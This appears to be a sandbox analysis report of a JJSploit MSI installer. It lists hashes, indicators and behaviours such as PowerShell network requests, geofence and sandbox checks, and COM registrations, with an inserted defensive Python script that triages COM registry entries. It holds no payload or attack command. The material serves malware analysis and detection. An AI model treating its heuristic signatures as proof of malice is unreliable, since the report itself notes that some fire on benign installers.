Analysis
max time kernel: 598s
max time network: 601s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 23-10-2024 16:05
Static task: static1
Behavioral task: behavioral1
Sample: JJSploit_8.10.8_x64_en-US.msi
Resource: win7-20241010-en
Behavioral task: behavioral2
Sample: JJSploit_8.10.8_x64_en-US.msi
Resource: win10v2004-20241007-en
General
Target: JJSploit_8.10.8_x64_en-US.msi
Size: 5.0MB
MD5: b837d10b9a71425dbf3d62b2cc59f447
SHA1: 85c9ba3331f7eb432c28365b0d1f36a201373a72
SHA256: 76c83d1bebd6b01bab76d9a94f223e1a3cf20f2040b8d58a12625074e2936f7c
SHA512: f20999d19c470941c85912725d6f89c5073d475572ece92ce5b8e5425cdf012950f230c353870d86469ab6658bdc504abbb41260cb676f109551860433bcb405
SSDEEP: 98304:XPky+agPtUpupDeOds+883iSh79bubjnvmu5/qv4eYb2Tqg9EeYImwqPY6Bvv8m:XPky9GtAcdsENbubzSJb9lyw
Malware Config
Signatures
Blocklisted process makes network request 2 IoCs
Processes: powershell.exe
flow | pid | process
53 | 3780 | powershell.exe
56 | 3780 | powershell.exe
Downloads MZ/PE file
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 4 IoCs
Processes: MicrosoftEdgeUpdate.exe, MicrosoftEdgeUpdate.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0" | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe | MicrosoftEdgeUpdate.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0" | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe | MicrosoftEdgeUpdate.exe
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: MicrosoftEdgeUpdate.exe, setup.exe, msedgewebview2.exe, msedgewebview2.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | MicrosoftEdgeUpdate.exe
Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | setup.exe
Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | msedgewebview2.exe
Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | msedgewebview2.exe
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Checks system information in the registry 2 TTPs 22 IoCs
System information is often read in order to detect sandboxing environments.
Drops file in Program Files directory 64 IoCs
Drops file in Windows directory 10 IoCs
Processes: msiexec.exe
description | ioc | process
File created | C:\Windows\Installer\e580f0e.msi | msiexec.exe
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
File opened for modification | C:\Windows\Installer\ | msiexec.exe
File created | C:\Windows\Installer\SourceHash{3D33D542-D2B2-4F33-A39D-CD4F70D3442E} | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI1095.tmp | msiexec.exe
File created | C:\Windows\Installer\{3D33D542-D2B2-4F33-A39D-CD4F70D3442E}\ProductIcon | msiexec.exe
File created | C:\Windows\Installer\e580f10.msi | msiexec.exe
File opened for modification | C:\Windows\Installer\e580f0e.msi | msiexec.exe
File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
File opened for modification | C:\Windows\Installer\{3D33D542-D2B2-4F33-A39D-CD4F70D3442E}\ProductIcon | msiexec.exe
Executes dropped EXE 42 IoCs
Loads dropped DLL 64 IoCs
Processes: JJSploit.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | JJSploit.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes: MicrosoftEdgeUpdate.exe, MicrosoftEdgeUpdate.exe, MicrosoftEdgeUpdate.exe, MicrosoftEdgeUpdate.exe, MicrosoftEdgeUpdate.exe
pid | process
864 | MicrosoftEdgeUpdate.exe
5896 | MicrosoftEdgeUpdate.exe
2712 | MicrosoftEdgeUpdate.exe
4380 | MicrosoftEdgeUpdate.exe
3220 | MicrosoftEdgeUpdate.exe
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
Enumerates system info in registry 2 TTPs 6 IoCs
Processes: msedgewebview2.exe, msedge.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedgewebview2.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedgewebview2.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedgewebview2.exe
Modifies data under HKEY_USERS 64 IoCs
Modifies registry class 64 IoCs
Processes: MicrosoftEdgeUpdateComRegisterShell64.exe, MicrosoftEdgeUpdate.exe
Entries (description, ioc, process):
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{492E1C30-A1A2-4695-87C8-7A8CAD6F936F}\Elevation\Enabled = "1" MicrosoftEdgeUpdate.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{837E40DA-EB1B-440C-8623-0F14DF158DC0}\ = "IAppBundleWeb" MicrosoftEdgeUpdateComRegisterShell64.exe
- Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{77857D02-7A25-4B67-9266-3E122A8F39E4}\VERSIONINDEPENDENTPROGID MicrosoftEdgeUpdate.exe
- Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26} MicrosoftEdgeUpdateComRegisterShell64.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4} MicrosoftEdgeUpdateComRegisterShell64.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe
- Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{CECDDD22-2E72-4832-9606-A9B0E5E344B2}\PROGID MicrosoftEdgeUpdate.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E4518371-7326-4865-87F8-D9D3F3B287A3}\ProxyStubClsid32\ = "{8208C91C-90E6-4EDA-B96F-A99E0009FBD3}" MicrosoftEdgeUpdateComRegisterShell64.exe
- Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{9F3F5F5D-721A-4B19-9B5D-69F664C1A591}\PROGID MicrosoftEdgeUpdate.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9F3F5F5D-721A-4B19-9B5D-69F664C1A591}\AppID = "{A6B716CB-028B-404D-B72C-50E153DD68DA}" MicrosoftEdgeUpdate.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF419FF9-90BE-4D9F-B410-A789F90E5A7C}\ = "Microsoft Edge Update Legacy On Demand" MicrosoftEdgeUpdate.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\NumMethods MicrosoftEdgeUpdate.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\ProxyStubClsid32\ = "{B019EEF0-C45E-464D-81C8-23283376FB2C}" MicrosoftEdgeUpdateComRegisterShell64.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\ = "ICoCreateAsyncStatus" MicrosoftEdgeUpdateComRegisterShell64.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{77857D02-7A25-4B67-9266-3E122A8F39E4}\VersionIndependentProgID\ = "MicrosoftEdgeUpdate.PolicyStatusMachineFallback" MicrosoftEdgeUpdate.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5F6A18BB-6231-424B-8242-19E5BB94F8ED}\LocalServer32\ = "\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.195.25\\MicrosoftEdgeUpdateOnDemand.exe\"" MicrosoftEdgeUpdate.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B019EEF0-C45E-464D-81C8-23283376FB2C}\InProcServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.195.25\\psmachine.dll" MicrosoftEdgeUpdate.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{99F8E195-1042-4F89-A28C-89CDB74A14AE}\ProxyStubClsid32\ = "{B019EEF0-C45E-464D-81C8-23283376FB2C}" MicrosoftEdgeUpdate.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E} MicrosoftEdgeUpdate.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{177CAE89-4AD6-42F4-A458-00EC3389E3FE}\ProxyStubClsid32\ = "{B019EEF0-C45E-464D-81C8-23283376FB2C}" MicrosoftEdgeUpdateComRegisterShell64.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E55B90F1-DA33-400B-B09E-3AFF7D46BD83}\NumMethods\ = "9" MicrosoftEdgeUpdateComRegisterShell64.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{177CAE89-4AD6-42F4-A458-00EC3389E3FE} MicrosoftEdgeUpdateComRegisterShell64.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B019EEF0-C45E-464D-81C8-23283376FB2C}\InProcServer32\ThreadingModel = "Both" MicrosoftEdgeUpdateComRegisterShell64.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3WebSvc.1.0\ = "Microsoft Edge Update Update3Web" MicrosoftEdgeUpdate.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A}\NumMethods MicrosoftEdgeUpdate.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7E29BE61-5809-443F-9B5D-CF22156694EB}\ = "IAppCommand2" MicrosoftEdgeUpdateComRegisterShell64.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4EE1FC-0A81-4F56-B0E2-248FB78051AF}\ProxyStubClsid32 MicrosoftEdgeUpdateComRegisterShell64.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E4518371-7326-4865-87F8-D9D3F3B287A3}\NumMethods\ = "4" MicrosoftEdgeUpdate.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\NumMethods\ = "10" MicrosoftEdgeUpdate.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7584D24A-E056-4EB1-8E7B-632F2B0ADC69}\ProxyStubClsid32\ = "{8208C91C-90E6-4EDA-B96F-A99E0009FBD3}" MicrosoftEdgeUpdateComRegisterShell64.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.OnDemandCOMClassMachine.1.0\CLSID\ = "{D1E8B1A6-32CE-443C-8E2E-EBA90C481353}" MicrosoftEdgeUpdate.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E} MicrosoftEdgeUpdateComRegisterShell64.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4EE1FC-0A81-4F56-B0E2-248FB78051AF} MicrosoftEdgeUpdateComRegisterShell64.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.CoreClass\CurVer\ = "MicrosoftEdgeUpdate.CoreClass.1" MicrosoftEdgeUpdate.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A5135E58-384F-4244-9A5F-30FA9259413C}\NumMethods MicrosoftEdgeUpdate.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4} MicrosoftEdgeUpdate.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DFFE7FE-3153-4AF1-95D8-F8FCCA97E56B}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DFFE7FE-3153-4AF1-95D8-F8FCCA97E56B}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF419FF9-90BE-4D9F-B410-A789F90E5A7C}\LocalServer32\ = "\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.195.27\\MicrosoftEdgeUpdateOnDemand.exe\"" MicrosoftEdgeUpdate.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2603C88B-F971-4167-9DE1-871EE4A3DC84} MicrosoftEdgeUpdate.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{897E5069-EE94-48DA-802C-40913293F608}\InprocHandler32\ThreadingModel = "Both" MicrosoftEdgeUpdate.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D9AA3288-4EA7-4E67-AE60-D18EADCB923D}\ProxyStubClsid32 MicrosoftEdgeUpdateComRegisterShell64.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\ProxyStubClsid32\ = "{8208C91C-90E6-4EDA-B96F-A99E0009FBD3}" MicrosoftEdgeUpdateComRegisterShell64.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{837E40DA-EB1B-440C-8623-0F14DF158DC0}\ = "IAppBundleWeb" MicrosoftEdgeUpdateComRegisterShell64.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\ProxyStubClsid32\ = "{8208C91C-90E6-4EDA-B96F-A99E0009FBD3}" MicrosoftEdgeUpdate.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C853632E-36CA-4999-B992-EC0D408CF5AB} MicrosoftEdgeUpdateComRegisterShell64.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{99F8E195-1042-4F89-A28C-89CDB74A14AE} MicrosoftEdgeUpdateComRegisterShell64.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\NumMethods\ = "17" MicrosoftEdgeUpdate.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F7B3738C-9BCA-4B14-90B7-89D0F3A3E497} MicrosoftEdgeUpdate.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{08D832B9-D2FD-481F-98CF-904D00DF63CC} MicrosoftEdgeUpdate.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E421557C-0628-43FB-BF2B-7C9F8A4D067C}\Elevation\IconReference = "@C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.195.27\\msedgeupdate.dll,-1004" MicrosoftEdgeUpdate.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.PolicyStatusMachineFallback\CLSID\ = "{77857D02-7A25-4B67-9266-3E122A8F39E4}" MicrosoftEdgeUpdate.exe
- Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26} MicrosoftEdgeUpdateComRegisterShell64.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17} MicrosoftEdgeUpdate.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2603C88B-F971-4167-9DE1-871EE4A3DC84}\NumMethods\ = "4" MicrosoftEdgeUpdate.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\NumMethods\ = "10" MicrosoftEdgeUpdateComRegisterShell64.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\ProxyStubClsid32\ = "{8208C91C-90E6-4EDA-B96F-A99E0009FBD3}" MicrosoftEdgeUpdateComRegisterShell64.exe
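The registry-class list above is mostly COM registration noise from the Edge updater, but three kinds of entry in it deserve a real look during triage: CLSIDs that point at a server binary (LocalServer32/InProcServer32, here MicrosoftEdgeUpdateOnDemand.exe and psmachine.dll under two version directories, 1.3.195.25 and 1.3.195.27), a CLSID registered with Elevation\Enabled = "1" (a class that can be instantiated through the COM elevation moniker, which is the surface UAC-bypass research targets), and the quoting of any LocalServer32 path that contains spaces. The script below is an added example written for this page, not part of the sandbox report or of any Microsoft tooling: it parses records in the sandbox's own text format, groups them per CLSID, and applies those three checks. The sample input is copied from the list above plus one clearly labelled hypothetical record (the all-zero CLSID) so that the negative checks have something to fire on.

```python
import re

# Constructed input: "Modifies registry class" records copied from the list
# above, one per line, plus one hypothetical record (the all-zero CLSID) that
# is NOT from the report and exists only to exercise the negative checks.
SAMPLE = r"""
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{492E1C30-A1A2-4695-87C8-7A8CAD6F936F}\Elevation\Enabled = "1" MicrosoftEdgeUpdate.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5F6A18BB-6231-424B-8242-19E5BB94F8ED}\LocalServer32\ = "\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.195.25\\MicrosoftEdgeUpdateOnDemand.exe\"" MicrosoftEdgeUpdate.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B019EEF0-C45E-464D-81C8-23283376FB2C}\InProcServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.195.25\\psmachine.dll" MicrosoftEdgeUpdate.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B019EEF0-C45E-464D-81C8-23283376FB2C}\InProcServer32\ThreadingModel = "Both" MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF419FF9-90BE-4D9F-B410-A789F90E5A7C}\LocalServer32\ = "\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.195.27\\MicrosoftEdgeUpdateOnDemand.exe\"" MicrosoftEdgeUpdate.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000001}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Hypothetical Tool\\hypothetical.exe" hypothetical.exe
"""

# One "Set value" record under a CLSID key, in either the native or the
# WOW6432Node hive. Interface/ProgID records do not match and are dropped.
CLSID_RECORD = re.compile(
    r'^Set value \((?:str|int)\) '
    r'\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\(?P<wow>WOW6432Node\\)?CLSID\\'
    r'\{(?P<clsid>[0-9A-Fa-f-]{36})\}\\(?P<sub>\S*) = "(?P<val>.*)" (?P<proc>\S+)$'
)

SERVER_SUBKEYS = {"localserver32", "inprocserver32", "inprochandler32"}
# Directories a standard user cannot write to; anything else is suspect.
TRUSTED_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")


def unescape(value):
    """Undo the sandbox's C-style escaping of quotes and backslashes, but keep
    any surrounding quotes: whether the path is quoted is itself a check."""
    return value.replace('\\"', '"').replace('\\\\', '\\')


def parse_clsid_records(text):
    records = []
    for line in text.splitlines():
        m = CLSID_RECORD.match(line.strip())
        if m:
            records.append(m.groupdict())
    return records


def summarize(records):
    """Per CLSID: server binaries (subkey, value), whether Elevation\\Enabled
    is "1", whether it was written under WOW6432Node, and which processes wrote it."""
    summary = {}
    for r in records:
        info = summary.setdefault(
            r["clsid"].upper(),
            {"servers": [], "elevation": False, "wow64": False, "writers": set()},
        )
        info["writers"].add(r["proc"])
        info["wow64"] = info["wow64"] or bool(r["wow"])
        sub = r["sub"].rstrip("\\")          # "LocalServer32\" is the default value
        if sub.lower() in SERVER_SUBKEYS:
            info["servers"].append((sub, unescape(r["val"])))
        elif sub.lower() == "elevation\\enabled" and r["val"] == "1":
            info["elevation"] = True
    return summary


def findings(summary):
    """Triage checks: auto-elevating classes, server binaries outside trusted
    roots, and LocalServer32 paths with spaces that are not quoted."""
    hits = []
    for clsid, info in sorted(summary.items()):
        if info["elevation"]:
            hits.append(("auto_elevating_com_class", clsid,
                         "Elevation\\Enabled=1; verify the server binary and who may CoCreate it"))
        for sub, raw in info["servers"]:
            path = raw.strip('"')
            if not path.lower().startswith(TRUSTED_ROOTS):
                hits.append(("server_outside_trusted_roots", clsid, f"{sub} -> {path}"))
            if sub.lower() == "localserver32" and " " in path and not raw.startswith('"'):
                hits.append(("unquoted_localserver_path", clsid, f"{sub} -> {raw}"))
    return hits


if __name__ == "__main__":
    for kind, clsid, detail in findings(summarize(parse_clsid_records(SAMPLE))):
        print(f"{kind:30} {{{clsid}}} {detail}")
```

On the records copied from this report the only hit is the Elevation\Enabled class {492E1C30-A1A2-4695-87C8-7A8CAD6F936F}, and its server binaries all sit under C:\Program Files (x86)\Microsoft\EdgeUpdate\, which is what a legitimate updater looks like; the two findings on the hypothetical record show what a dropped COM server in a user-writable directory would produce.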
Suspicious behavior: EnumeratesProcesses 33 IoCs
Processes: msiexec.exe, powershell.exe, MicrosoftEdgeUpdate.exe, msedge.exe, identity_helper.exe, msedgewebview2.exe
Entries (pid process; repeated entries counted in parentheses):
- 1292 msiexec.exe (2)
- 3780 powershell.exe (3)
- 1044 MicrosoftEdgeUpdate.exe (6)
- 2276 msedge.exe (2)
- 3776 msedge.exe (2)
- 5044 msedge.exe (2)
- 6008 identity_helper.exe (2)
- 5644 MicrosoftEdgeUpdate.exe (4)
- 5440 msedgewebview2.exe (2)
- 4360 msedge.exe (4)
- 5152 MicrosoftEdgeUpdate.exe (2)
- 5460 MicrosoftEdgeUpdate.exe (2)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
Processes: msedgewebview2.exe, msedge.exe
Entries (pid process; repeated entries counted in parentheses):
- 3604 msedgewebview2.exe (1)
- 5044 msedge.exe (9)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: msiexec.exe (PID 4604, the client that was given the .msi) and msiexec.exe (PID 1292, the Windows Installer service)
Entries (Token: privilege pid process), grouped by process in the order logged:
- 4604 msiexec.exe: SeShutdownPrivilege, SeIncreaseQuotaPrivilege
- 1292 msiexec.exe: SeSecurityPrivilege
- 4604 msiexec.exe, a pass over the full privilege set: SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
- 4604 msiexec.exe: the same 29-privilege pass a second time, then SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege again, at which point the report's 64-IoC cap cuts the list off

Enabling every privilege named in its token is routine for msiexec.exe; this signature fires on benign installers in the same way, so on its own it is not evidence of malicious behaviour.
Suspicious use of FindShellTrayWindow 28 IoCs
Processes: msiexec.exe, JJSploit.exe, msedge.exe
Entries (pid process, in the order logged):
- 4604 msiexec.exe
- 3724 JJSploit.exe
- 4604 msiexec.exe
- 5044 msedge.exe (25)
Suspicious use of SendNotifyMessage 24 IoCs
Processes: msedge.exe
Entries (pid process):
- 5044 msedge.exe (24)
Suspicious use of WriteProcessMemory 64 IoCs
Processes: msiexec.exe, powershell.exe, MicrosoftEdgeWebview2Setup.exe, MicrosoftEdgeUpdate.exe, MicrosoftEdge_X64_130.0.2849.52.exe, setup.exe, MsiExec.exe, JJSploit.exe, msedgewebview2.exe, cmd.exe, msedge.exe
Entries ("PID <parent> wrote to memory of <child>", shown as parent -> child; the sandbox logs each edge two or three times, count in parentheses):
- 1292 msiexec.exe -> 1384 MsiExec.exe (3)
- 1292 msiexec.exe -> 1932 srtasks.exe (2)
- 1292 msiexec.exe -> 3780 powershell.exe (2)
- 3780 powershell.exe -> 768 MicrosoftEdgeWebview2Setup.exe (3)
- 768 MicrosoftEdgeWebview2Setup.exe -> 1044 MicrosoftEdgeUpdate.exe (3)
- 1044 MicrosoftEdgeUpdate.exe -> 2608 MicrosoftEdgeUpdate.exe (3)
- 1044 MicrosoftEdgeUpdate.exe -> 4428 MicrosoftEdgeUpdate.exe (3)
- 4428 MicrosoftEdgeUpdate.exe -> 440 MicrosoftEdgeUpdateComRegisterShell64.exe (2)
- 4428 MicrosoftEdgeUpdate.exe -> 3672 MicrosoftEdgeUpdateComRegisterShell64.exe (2)
- 4428 MicrosoftEdgeUpdate.exe -> 944 MicrosoftEdgeUpdateComRegisterShell64.exe (2)
